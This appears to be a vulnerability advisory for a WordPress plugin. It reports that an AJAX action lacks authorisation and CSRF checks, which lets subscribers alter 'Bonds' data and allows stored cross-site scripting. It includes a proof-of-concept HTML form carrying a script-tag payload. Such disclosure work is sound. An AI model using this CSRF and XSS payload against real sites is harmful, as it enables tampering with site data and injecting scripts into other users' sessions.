The plugin does not have any authorisation and CSRF in an AJAX action, allowing any authenticated users, such as subscribers to call it and add/delete/edit Bonds. Furthermore, due to the lack of sanitisation and escaping, it could also lead to Stored Cross-Site Scripting issues
Open a page containing the HTML code below as any authenticated user, or make any authenticated user open it via a CSRF attack <form action="https://example.com/wordpress/wp-admin/admin-ajax.php" method="POST"> <input type="text" name="action" value="SBF_DB_code_manage_action"> <input type="text" name="B_COMMAND" value="ADD"> <input type="text" name="B_PARAM" value="10"> <input type="text" name="B_PARAM2" value="<script>alert(/XSS/)</script>"> <input type="text" name="B_PARAM3" value="1"> <input type="submit" name="submit" value="submit"> </form>
Lana Codes
Lana Codes
Yes
2022-08-31 (about 1 years ago)
2022-08-31 (about 1 years ago)
2022-08-31 (about 1 years ago)